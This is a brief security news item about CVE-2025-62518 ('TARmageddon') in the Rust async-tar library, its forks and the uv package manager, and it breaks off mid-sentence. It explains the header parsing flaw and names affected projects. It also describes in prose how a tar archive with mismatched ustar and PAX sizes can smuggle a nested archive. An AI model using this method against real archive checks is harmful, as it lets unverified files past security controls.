In the library async-tar written in Rust, a vulnerability has been identified (CVE-2025-62518, codename TARmageddon) which allows for the extraction of files located not only in a specially designed tar archive but also in nested tar archives when unpacking. This vulnerability can be exploited to bypass archive verification systems and unpack unverified files. The issue is due to an incorrect choice of position when parsing different size values in ustar and PAX headers within tar archives.
The vulnerability also extends to forks of the async-tar library, such as tokio-tar, krata-tokio-tar, and astral-tokio-tar, as well as in utilities like the package manager uv, created as a high-performance alternative to “pip” for Python projects. Popular projects utilizing these vulnerable libraries include the testcontainers toolkit for running docker containers and the WebAssembly runtime wasmCloud, with significant download numbers in the crates.is repository.
To execute an attack, one can create a TAR archive where the ustar header specifies a size of zero while the PAX format header contains the actual size. This causes the content of the file with another tar archive to be processed as part of the primary archive. A sample code for crafting such archives can be found on GitHub here. The vulnerability has been fixed in the releases of tokio-tar 0.5.6 and